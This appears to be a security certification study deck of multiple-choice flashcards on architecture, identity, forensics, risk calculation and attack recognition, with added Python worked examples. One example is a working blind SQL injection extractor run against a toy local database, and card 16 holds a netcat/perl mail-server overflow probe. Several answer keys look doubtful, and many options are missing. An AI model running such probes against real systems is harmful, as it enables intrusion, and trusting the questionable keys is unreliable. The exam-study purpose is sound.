80 Questions from Wilfredo Flashcards

1
Q

An organization is moving to a new data center. Management has issued a mandate to fix some of the existing security deficiencies in the organization. The following requirements have been set by the management team:
Requirement 1: the solution must be able to enforce segregation of critical systems.
Requirement 2: the solution must be able to provide SSL inspection for our users' web traffic.
Requirement 3: provide a single network entry point for external applications.
Requirement 4: enable availability of external networks.
Drag and drop the BEST security solutions to meet the above requirements.

A

Requirement 1: VLANs (segregation of critical systems at layer 2)
Requirement 2: Forward proxy (a TLS-terminating forward proxy is the component that can inspect users' outbound web traffic)
Requirement 3: Reverse proxy (single network entry point in front of the externally facing applications)
Requirement 4: WAF
A WAF filters inbound requests to the organization's own web applications; it cannot see users' outbound browsing, so SSL inspection of user traffic belongs to the forward proxy. The wording of requirement 4 is garbled on the card, so its mapping should be treated with caution.

2
Q

An insurance company has a number of disparate web-based applications, which include a CRM, broker portal, and policy system. Some of the applications are hosted internally on the network and others externally as SaaS. Brokers can access the solution through mobile, tablet, or full desktop browsers, as they are constantly on the move. Broker feedback has come back with the following requirement enhancements for the next release of the solution:
Requirement 1: provide limited functionality on the website using a social media account.
Requirement 2: provide SSO between each of the applications.
Requirement 3: authorize internal web services on the ESB.
Requirement 4: support step-up authentication for any changes to PII in the application.

A

Requirement 1: OAuth (delegated, limited access granted through a social media account)
Requirement 2: SAML (browser-based SSO across the internal and SaaS applications)
Requirement 3: WS-Federation (WS-Security is the other common standard for authorizing SOAP service calls on an ESB)
Requirement 4: Active Directory (in practice step-up authentication is enforced by the identity provider or MFA layer; the directory only supplies the identities it checks against)

3
Q

Encryption algorithms?

A

Symmetric encryption algorithms: DES, 3DES and AES (block ciphers) and SEAL (a stream cipher). DES and 3DES are deprecated because of their 64-bit block size and, for DES, its 56-bit key; AES is the current choice.

4
Q

Hashing algorithms?

A

MD5, SHA-1, SHA-2 (SHA-256/384/512) and SHA-3. MD5 and SHA-1 are no longer collision resistant and must not be used for digital signatures or certificate fingerprints; they survive only for non-security checksums.

5
Q

A security administrator is seeking to establish awareness of emerging threats, and use threat information to build a robust SOC. Which of the following will BEST help the security administrator accomplish this goal? (Select THREE)

A

A. Security conferences
B. RFIs to industry peers
E. Threat intelligence feeds

6
Q

While conducting a forensic investigation, a security engineer is asked to secure a smartphone. Based on the make and model, the engineer knows the device supports internal memory cards, wireless, and Bluetooth connections. Which of the following are the MOST suitable best practices to follow? (Select TWO)
A. Secure a reliable internet connection for the device
B. Pair the device with the examination laptop
C. Seal the device into a Faraday bag
D. Provide a reliable power source to the device
E. Immediately power off the device
F. Detach the memory card from the device

A

C and D. Seal the device in a Faraday bag so it cannot receive a remote wipe, a lock command or new data over cellular, Wi-Fi or Bluetooth, and keep it on a reliable power source so the volatile state and any unlocked session are not lost. Pairing it with the examination laptop alters the evidence, powering it off discards volatile data and may re-engage encryption or a lock screen, and detaching the memory card changes the device's state before it has been imaged.

7
Q

The IT department is charged with developing a solution that will enable all employees to quickly reach other employees and communicate securely amongst them in real time. The solution must implement encrypted file transfer and voice communication and must integrate with the existing email and calendaring system. Which of the following MUST the solution implement to ensure employees can make educated decisions about when to contact other employees?
A. Messaging
B. Presence
C. Peer-to-peer
D. Social media

A

B. Presence

8
Q

A company security administrator attempts to perform a factory reset on the phone issued to a fired employee. The administrator receives an error that the device is not available. Which of the following is likely the reason why the reset failed?

A

A. The employee has disabled network connectivity to the phone

9
Q

The online banking credentials of the Chief Executive Officer (CEO) of a research company were recently compromised. Despite the fact that banks no longer require frequent password changes, the CEO frequently changed this password. Now, because of the experience, the CEO questions the value of routine password changes at the company. Which of the following communicates the BEST approach for the company’s security policies?

A

C. The nature of the research company’s threat may be different from banks, so the company should consider the specific threats it needs to address.

10
Q

The Chief Information Security Officer (CISO) informs the team that since the organization will sign a NDA with any potential suppliers, the most current industry evaluation should include details of tests performed by the supplier’s auditors and the associated results. Based on the requirements provided by the CISO, which of the following reports should be requested in the RFP?

A

B. SOC 2 (a SOC 2 Type II report contains the description of the auditor's tests and their results and is a restricted-use document, which is why the NDA matters; a SOC 3 report is the public summary without that detail)

11
Q

An IT manager has received the following email from the Chief Information Officer (CIO): On a recent business trip, I sat next to another executive and we talked about a new teleconferencing solution that his organization had recently switched to. He said switching to it saved them lots of money and that it worked much better than their current solution and had a lot of new features. I know we utilize a solution that is hosted in-house, but I'd like you to evaluate this as a potential solution.
Based on the information above, which of the following actions should the IT manager take to collaborate within the organization and evaluate the security of a potential solution?

A

C. Work with the telecom manager to determine if the alternative provides an equivalent security posture compared to the existing solution, if it provides an equivalent feature set, and what the result of a cost/benefit analysis is.

12
Q

The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payment. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. A specially crafted value could be entered and cause a rollover, resulting in the shipping cost being subtracted from the balance and in some instances resulting in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes the application issue?

A

C. Integer overflow
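
Worked example (added here; it is not part of the original deck and the amounts are constructed): the rollover the card describes, reproduced with 32-bit signed arithmetic, next to the input validation that prevents it. The helper names and the $10,000 shipping ceiling are assumptions for the illustration.

```python
# Added example, not from the flashcard deck: models the shipping-cost
# rollover from the card with 32-bit signed integer arithmetic, then shows
# the range check that stops it. Amounts are in cents and the order values
# are constructed for illustration.

INT32_MAX = 2**31 - 1
INT32_MIN = -2**31


def wrap_i32(value: int) -> int:
    """Emulate a 32-bit signed integer. Python ints never overflow, so the
    wrap-around a C- or PHP-style int exhibits is applied by hand."""
    return ((value + 2**31) % 2**32) - 2**31


def charge_vulnerable(items_cents: int, shipping_cents: int) -> int:
    """Vulnerable path: trusts the client-supplied shipping amount.

    items + shipping is computed in 32-bit arithmetic, so a large shipping
    value wraps negative; the clamp to zero afterwards (what the card says
    the payment system did with negative balances) makes the order free."""
    total = wrap_i32(items_cents + shipping_cents)
    return max(total, 0)


def charge_hardened(items_cents: int, shipping_cents: int,
                    max_shipping_cents: int = 1_000_000) -> int:
    """Hardened path: validate the range before any arithmetic and refuse a
    result outside the representable range instead of wrapping it."""
    if not 0 <= shipping_cents <= max_shipping_cents:
        raise ValueError("shipping amount out of range")
    if items_cents < 0:
        raise ValueError("item total out of range")
    total = items_cents + shipping_cents
    if total > INT32_MAX:
        raise OverflowError("order total exceeds representable amount")
    return total


def crafted_shipping(items_cents: int) -> int:
    """The attacker's arithmetic: the smallest shipping value that pushes the
    32-bit sum past INT32_MAX so that it wraps negative."""
    return INT32_MAX - items_cents + 1


if __name__ == "__main__":
    cart = 5_000  # $50.00 of goods (constructed)
    evil = crafted_shipping(cart)
    print("vulnerable charge:", charge_vulnerable(cart, evil))
    try:
        charge_hardened(cart, evil)
    except ValueError as exc:
        print("hardened rejects:", exc)
```

The fix is the range check on the untrusted value, not the clamp: clamping a negative total to zero is what turned an arithmetic bug into free goods.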

13
Q

A security analyst has been asked to perform a risk assessment on a human resources workflow and give a recommendation to improve the security. While performing the analysis, the security analyst finds the human resources department needs to quickly share employee information with a third-party vendor in an ongoing fashion. The human resources manager is concerned that any modification to the workflow will prevent the data from being received in time. At the end of the assessment, which of the following is the BEST solution?

A

B. Recommend a cloud storage service for collaboration

14
Q

Security architects often have to design systems for environments where different stakeholders have competing requirements. In addition to internal influences and competitors, which of the following often has a major effect on mandatory system design features?

A

D. Regulatory entities

15
Q

A security engineer is analyzing security differences between commercial products. The engineer is implementing one-time password authentication schemes that are based on software or hardware tokens where the secret key is shared between the server and the token. Which of the following BEST describes the main design differences?

A

B. Software token devices must implement encryption techniques to emulate an equivalent security level as hardware tokens.

16
Q

During a routine vulnerability assessment, the following command was successful:
echo "vrfy `perl -e 'print "hi" x 500'`" | nc www.company.com 25
Which of the following vulnerabilities is being exploited?

A

A. Buffer overflow directed at a specific host MTA (the perl substitution produces a 1,000-byte argument, far longer than any mailbox name, and hands it to the mail server's VRFY handler, which copies it into a fixed-size buffer)

17
Q

A company develops a wide array of proprietary software for its clients utilizing an agile development methodology. Many of the company’s prominent products use various open source libraries. Recently, a vulnerability in an open source security library allowed malicious attackers to bypass certificate revocation lists to compromise secure data. Which of the following is BEST implemented to help prevent this in the future?

A

D. The company should include the open source libraries in its code review process at regular intervals during the SDLC.

18
Q

A security administrator is assisting law enforcement in collecting evidence of a computer crime. The administrator has access to the latest forensics tools. The computer system being examined is still running and has not been tampered with since law enforcement arrived. The security administrator needs to collect as much information as possible before transporting the computer to a laboratory. Which of the following is the BEST order in which to proceed?

A

D. Image RAM, image the HDD/SSD while running the OS, copy system NVRAM, shutdown the system for transport

19
Q

A bank is looking to provide a service to allow customers to view their account balances without logging into the Internet banking portal. The bank sees the benefit in reducing the number of authentication calls for low-risk, high-load transactions. The primary goal would be to improve overall performance and provide new functionality to customers. As part of the project, the bank wants to enable this access capability through mobile devices and browsers. Which of the following solutions will meet the bank’s requirements?

A

C. Enable an API call utilizing OAuth

20
Q

A public utility company has recently seen an increase in spear phishing attacks that have occurred against targeted employees. The company is relatively small and uses manual processes to monitor such attacks. The company then receives a report that the public website has been defaced with hacktivist comments. The company cannot isolate the server, as certain components are used to process payments via the public website, but quickly remediates the defacement. Which of the following MOST likely occurred in addition to the defacement?

A

B. The email system was compromised

21
Q

A security architect is designing a series of technical protect, detect, and respond security capabilities with significant automation potential. One of the objectives is to ensure tools from various vendors can be implemented and support standardized data exchange. The architect would like to initially select a solution that supports automated configuration checklists. Which of the following solutions should be selected?

A

B. SCAP

22
Q

Company XYZ has a large sales force that works from home. To increase sales effectiveness and reduce travel costs, the company purchased video conferencing equipment for all home offices. Since using the video conferencing equipment, some customers have begun to demand lower prices. The company’s senior officers suspect these customers know the company’s margins, because members of the sales force keep printed proprietary information in their home offices. Which of the following represents the BEST immediate response action while the security team develops a more complete response?

A

C. Enforce a clear field of view policy during customer teleconferences.

23
Q

An existing financial system has identified vulnerabilities and the vendor has recommended an upgrade. The company, however, has planned to replace the system with a competing product costing $200,000 within 3 years. The security engineer has estimated that a breach of the existing system would have an ARO of 2 and a SLE of $40,000. The Chief Information Officer (CIO) continues with the plan to upgrade in 3 years. Which of the following BEST describes how the CIO addressed the risk of the existing product?

A

D. The CIO accepted the risk (the ALE of the existing system is ARO 2 x SLE $40,000 = $80,000 per year, about $240,000 over the three years until the $200,000 replacement; by keeping to that timeline instead of applying the vendor's upgrade, the CIO chose to carry the exposure rather than mitigate, transfer or avoid it)

24
Q

Some operating systems and applications come with a default shared and privileged users. The Chief Information Security Officer (CISO) requires Joe, a security administrator, to develop a security policy and a related procedure to establish individualized access to meet CIA objectives and address legal and regulatory requirements. Which of the following is the MOST important administrative control that should be required in the policy and procedure? (Select TWO)

A

A. User accountability

B. Least privilege

25
Q

A penetration tester attempts to trick the Chief Executive Officer’s (CEO) administrative assistant into running a malicious .exe file hosted on a remote server by sending the URL to the .exe in a carefully crafted email. The penetration tester would like to create the .exe file so that, upon execution, it initiates a TLS-secured TCP connection to a remote server, thereby giving the penetration tester remote access to the assistant’s computer. Which of the following tools would the penetration tester use to create the .exe file?

A

A. Metasploit

26
Q

While analyzing network traffic, a security engineer discovers that confidential emails were passing between two users who should not have had this information. The two users deny sending confidential emails to each other. Which of the following security practices would allow for non-repudiation and prevent the users from removing emails such as these from their accounts? (Select TWO)

A

A. Digital signature

C. Legal hold

27
Q

An employee from finance was dismissed when it was discovered that the employee had been committing financial fraud for several years. The most trusted senior manager in finance has been reassigned the duty of performing wire transfers. The Chief Financial Officer (CFO), is asking the Chief Information Security Officer (CISO) to implement stronger controls to secure how the transfers are performed. Which of the following responses should the CISO deliver?

A

C. Implement DLP at the gateway, and implement two-factor authentication on the workstation where the transactions are performed.

28
Q

During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 30 percent of the desktops do not meet regulations because the devices are consistently being changed to override settings that do not meet policy. Which of the following is the BEST solution to correct the issue and prevent future noncompliance?

A

D. Implement group policy to enforce configuration settings

29
Q

During a routine audit of the organization’s information systems, the auditing team notified the organization of a new requirement in another country which requires all financial transaction data to be encrypted in transit as well as at rest. The organization does business in this country, but the data is hosted at a set of redundant data centers which are outside of the country in question. Based on the scenario provided, which of the following is the MOST appropriate course of action for the Chief Information Security Officer (CISO) to take in addressing this new requirement?

A

A. Conduct further research to determine the scope and details of the new requirement

30
Q

A security administrator needs an external vendor to correct an urgent issue with an organization’s physical access control system (PACS). The PACS does not currently have Internet access because it is running a legacy operating system. Which of the following methods should the security administrator select that BEST balances security and efficiency?

A

C. Set up new VPN concentrator for the vendor and restrict access to the PACS using desktop sharing

31
Q

An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate?

A

D. Subject Alternative Name (SAN) certificate (the SAN extension lists every DNS name the certificate is valid for; a wildcard such as *.example.com could cover neither the example.org names nor both domains at once)

32
Q

After solely reviewing the below output:
user@linux:/usr/local/bin$ ls -al
total 376
drwxr-xr-x  2 user        4096 2010-09-29 11:35 .
drwxrwxrwt 20 root root 348160 2010-09-29 11:35 ..
-rwsr-xr-x  1 root user   26188 2010-09-29 11:23 newprog
Which of the following can the administrator conclude about the program?

A

D. The program may lead to a privilege escalation (the s in the owner-execute position means newprog runs with root's effective UID for any user who executes it, so any flaw in it is a root exploit; the directory holding it is owned by user rather than root, so that user can also delete or replace the file)
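
Worked example (added here; not part of the original deck): a parser for `ls -al` output that picks out setuid/setgid files and reports who controls the directory they live in. The listing is the card's own, cleaned up; the group column for `.` was dropped on the card and is restored as `user` (an assumption). Nothing is read from the live filesystem.

```python
# Added example, not from the flashcard deck: parses the `ls -al` listing
# shown on the card and explains why a setuid-root file in a directory owned
# by a non-root user is a privilege-escalation risk. The LISTING text is the
# card's listing with its columns restored; the '.' group is assumed.
import re
from typing import Dict, List

LISTING = """\
total 376
drwxr-xr-x  2 user user   4096 2010-09-29 11:35 .
drwxrwxrwt 20 root root 348160 2010-09-29 11:35 ..
-rwsr-xr-x  1 root user  26188 2010-09-29 11:23 newprog
"""

# type+perms, link count, owner, group, size, date, time, name
ENTRY = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+(?P<name>.+)$"
)


def parse_listing(text: str) -> List[Dict[str, str]]:
    """Turn `ls -al` lines into dicts; the 'total' line and blanks are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def is_setuid(mode: str) -> bool:
    # Owner-execute position (index 3) reads 's' for setuid+exec, 'S' for
    # setuid without exec.
    return mode[3] in "sS"


def is_setgid(mode: str) -> bool:
    # Same rule at the group-execute position (index 6).
    return mode[6] in "sS"


def dir_writable_by_others(mode: str) -> bool:
    # Group-write (index 5) or other-write (index 8). A sticky bit ('t' at
    # index 9) stops other users unlinking files, but never the directory owner.
    return mode[5] == "w" or mode[8] == "w"


def assess(text: str) -> List[str]:
    """Findings about setuid/setgid files and who controls their directory."""
    entries = parse_listing(text)
    cwd = next((e for e in entries if e["name"] == "."), None)
    findings = []
    for e in entries:
        if e["name"] in (".", "..") or e["mode"][0] != "-":
            continue
        if is_setuid(e["mode"]):
            findings.append(f"{e['name']}: setuid, runs as {e['owner']}")
            if cwd is not None and cwd["owner"] != e["owner"]:
                findings.append(
                    f"{e['name']}: directory owned by {cwd['owner']}, who can "
                    f"delete or replace the {e['owner']}-owned setuid binary")
            if cwd is not None and dir_writable_by_others(cwd["mode"]):
                findings.append(f"{e['name']}: directory is group/world writable")
        if is_setgid(e["mode"]):
            findings.append(f"{e['name']}: setgid, runs as group {e['group']}")
    return findings


if __name__ == "__main__":
    for finding in assess(LISTING):
        print(finding)
```

The same parser works on real `ls -al` output; on a live host the equivalent sweep is `find / -perm -4000 -type f`, followed by checking the ownership and write bits of each result's directory.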

33
Q

A major healthcare provider was recently fined for not following regulatory compliance. The Chief Information Security Officer is concerned that the organization is not trained and aware of cybersecurity-related issues. Which of the following is the MOST effective method of gaining access to the organization's sensitive information?

A

D. Social engineering

34
Q

Corporate policy prohibits employees from connecting SOHO routers to their office. Using a network analyzer, a security administrator is conducting an assessment to verify if SOHO routers are connected to the enterprise network. The security administrator is analyzing the following PCAP file:
01:04:23.001265 10.234.7.22.50212 > www.comptia.80: P 39438485 (0) ack 39438484 ...
01:04:23.009265 10.234.7.22.40033 > www.comptia.80: P 394384433 (0) ack 39438484 ...
01:04:23.030265 10.234.7.22.50212 > www.comptia.80: P 39438495 (0) ack 39438484 ...
Which of the following can the security administrator infer from the above capture?

A

D. Corporate policy is being followed by all employees and there is no evidence of SOHO routers being connected to the network.

35
Q

A security architect is looking into the following vendor proposal for implementing a secure code scanning platform. Proposal: Software purchase with license fee of $40,000 and a 30% support fee per annum from year 2 onwards. Requires internal hardware hosting which is $5,000. Which of the following is the TCO for this proposal after five years?

A

D. $93,000 ($40,000 licence in year 1, plus 30% support of $12,000 in each of years 2 to 5 = $48,000, plus $5,000 for hosting hardware)

36
Q

A security analyst finds the following web logs after a breach of sensitive information:
http://www.data.com/gender.php?val=male
http://www.data.com/gender.php?val=female
http://www.data.com/gender.php?val=ABC female
http://www.data.com/gender.php?val=GHI
http://www.data.com/gender.php?val=QRS Female
Which of the following describes the attack being performed?

A

D. Blind SQL injection (the val parameter, which should only ever be male or female, is being fed one altered value after another; the attacker learns from whether each page returns results, not from any error text or echoed data)
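
Worked example (added here; not part of the original deck): a boolean-based blind SQL injection against an in-memory SQLite table that stands in for the card's gender.php endpoint, the parameterized query that stops it, and a small log check for probes like the card's entries. The table contents, the api_key secrets, the endpoint's "results found"/"no results" behaviour and the function names are all constructed for the illustration.

```python
# Added example, not from the flashcard deck: a boolean-based blind SQL
# injection against an in-memory SQLite table standing in for the card's
# gender.php?val=... endpoint, next to the parameterized query that stops it,
# plus a log check for probes like the ones on the card. The table, the
# secret api_key values and the endpoint behaviour are all constructed.
import sqlite3
from urllib.parse import parse_qs, urlsplit

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, gender TEXT, api_key TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [("alice", "female", "k3y"), ("bob", "male", "b0b")])
conn.commit()


def gender_php_vulnerable(val: str) -> str:
    """String-concatenated query. The page never echoes data or errors, only
    whether any rows matched, which is all a blind injection needs."""
    rows = conn.execute(
        f"SELECT name FROM users WHERE gender = '{val}'").fetchall()
    return "results found" if rows else "no results"


def gender_php_fixed(val: str) -> str:
    """Parameterized query: val is bound as data and never parsed as SQL."""
    rows = conn.execute(
        "SELECT name FROM users WHERE gender = ?", (val,)).fetchall()
    return "results found" if rows else "no results"


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def blind_extract(oracle, target_sql: str, max_len: int = 16) -> str:
    """Recover the result of target_sql one character at a time by asking the
    endpoint yes/no questions: a valid gender ANDed with a condition on one
    character of the secret. Every probe is a value that is not a gender at
    all, which is exactly what makes the card's log lines suspicious."""
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in ALPHABET:
            probe = f"female' AND substr(({target_sql}),{pos},1)='{ch}"
            if oracle(probe) == "results found":
                hit = ch
                break
        if hit is None:  # no character matched: past the end of the secret
            break
        recovered += hit
    return recovered


SQL_TOKENS = ("'", " and ", " or ", "substr(", "--", "sleep(", "union ")


def looks_like_sqli(url: str) -> bool:
    """Flag a request whose val parameter carries SQL syntax (the kind of
    check a WAF rule or a log review would apply to the card's entries)."""
    val = parse_qs(urlsplit(url).query).get("val", [""])[0].lower()
    return any(tok in val for tok in SQL_TOKENS)


if __name__ == "__main__":
    secret = "SELECT api_key FROM users WHERE name='bob'"
    print("vulnerable endpoint leaks:", blind_extract(gender_php_vulnerable, secret))
    print("fixed endpoint leaks:", repr(blind_extract(gender_php_fixed, secret)))
```

Against the bound query the same probes are compared literally with the gender column and never match, so the extraction loop recovers nothing; the page's behaviour is identical whether or not the attacker's condition is true.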

37
Q

Which of the following encryption methodologies should be implemented in an environment where all users need access to bulk storage, but not all users have authorized access to each individual database entry?

A

A. Row-level encryption

38
Q

Senior management wants to prevent sensitive data from being leaked onto the web, however, they cannot afford a mature DLP solution. A security administrator has been tasked with finding an alternative solution. After researching multiple products, the security administrator recommends implementing a:

A

B. WAF

39
Q

The functional testing team at a large organization uses a test harness framework. This allows the testing team to perform automated regression testing on a nightly basis for both infrastructure and web applications. The penetration testing team currently performs manual and targeted testing at major project delivery milestones. The project management team has placed cost and time pressures on security testing. Which of the following will allow the penetration testers to BEST ensure security testing activities occur more frequently and at reduced cost? (Select TWO)

A

C. Cross-train the functional testing team so team members understand how to perform basic security tests.
E. Provide security test cases to the functional testing team for integration into the existing test harness.

40
Q

A solutions architect attempts to make an update to a server and is prevented from changing the application. Additionally, the server would not allow the architect to see application errors related to the issue. The security log reports that file attributes can only be changed by the web server application and not the solutions architect's custom application. The architect verifies that all file system permissions are correct and all application services are running properly. Which of the following is MOST likely being used on the server and is causing the issue?

A

A. A trusted operating system

41
Q

The data backup window has expanded into the morning hours and has begun to affect production users. The main bottleneck in the process is the time it takes to replicate the backups to separate servers at the offsite data center. Which of the following uses of deduplication could be implemented to reduce the backup window?

A

C. Implement deduplication on the server storage to reduce the data backed up

42
Q

To ensure a company is adhering to regulatory requirements, a process is in place to check security controls such as separation of duties. Which of the following is this process called?

A

D. Continuous monitoring

43
Q

A security administrator is scheduling an internal network vulnerability scan for the first time. The administrator has scheduled a one-week scanning window but does not know how long the scan will take. Which of the following BEST explains what the administrator should do to reduce the risk of causing unknown impacts to the environment? (Select TWO)

A

A. Commence the scan at the start of the scanning window and ensure DoS signatures are disabled.
C. Update the plugins to the latest versions and disable time-consuming or resource consuming plugins.

44
Q

Which of the following provides the BEST risk calculation methodology?

A

B. Potential Loss x Event Probability x Control Failure Probability

45
Q

An organization utilizes full packet capture on all network traffic in its environment. A security analyst is inspecting a packet capture of the traffic to a web server that occurred prior to the system being compromised. The analyst notices a string of 100 occurrences of 09. Which of the following attacks MOST likely occurred?

A

Buffer overflow. A run of 100 identical bytes in a request to the web server is the padding or NOP sled (classically 0x90 on x86) placed ahead of the payload in a buffer overflow; an integer overflow leaves no such signature in traffic.

46
Q

The security architect has been asked by the web development team for a way to authenticate to an external company’s CRM application across the internet. The web application needs to authenticate through the browser, maintain session state, and be a known identity management control. Which of the following solutions is MOST likely to be the correct standard to use.

A

B. SAML

47
Q

The Information Security Officer (ISO) has submitted a $500,000 budget request for the next three years to purchase network equipment in support of the newly upgraded Internet bandwidth, which is now 400Mbps. The IT department plans to implement a chargeback system to recover the costs incurred from the new equipment. The ISO forecasts that the IT department will be able to recuperate $1/GB utilized. Which of the following is the five year ROI the ISO is expecting, based on a projected average bandwidth utilization of 2TB/Day?

A

D. 630% (2 TB/day, taken as 2,000 GB/day, x 365 days x 5 years = 3,650,000 GB, recovered at $1/GB = $3,650,000; ROI = ($3,650,000 - $500,000) / $500,000 = 630%)

48
Q

An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure. Which of the following is the MOST accurate statement?

A

D. Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases.

49
Q

Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO)

A

D. HTTP interceptor

E. Vulnerability scanner

50
Q

A university has implemented a commercial emergency notification system that alerts users to an emergency on campus with text messages and voice calls. A system administrator must develop a small application that would send desktop notifications in the event of an emergency, since it is not supported by the commercial system. Which of the following should be considered when deciding to implement this application in-house? (Select TWO)

A

C. Ease of usability

D. Ongoing support of the application

51
Q

A company provides on-demand cloud computing resources for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for customer access to the administrative website. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data from customer A was found on a hidden directory within the VM of company B. Company B is not in the same industry as company A and the two are not competitors. Which of the following has MOST likely occurred?

A

A. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data.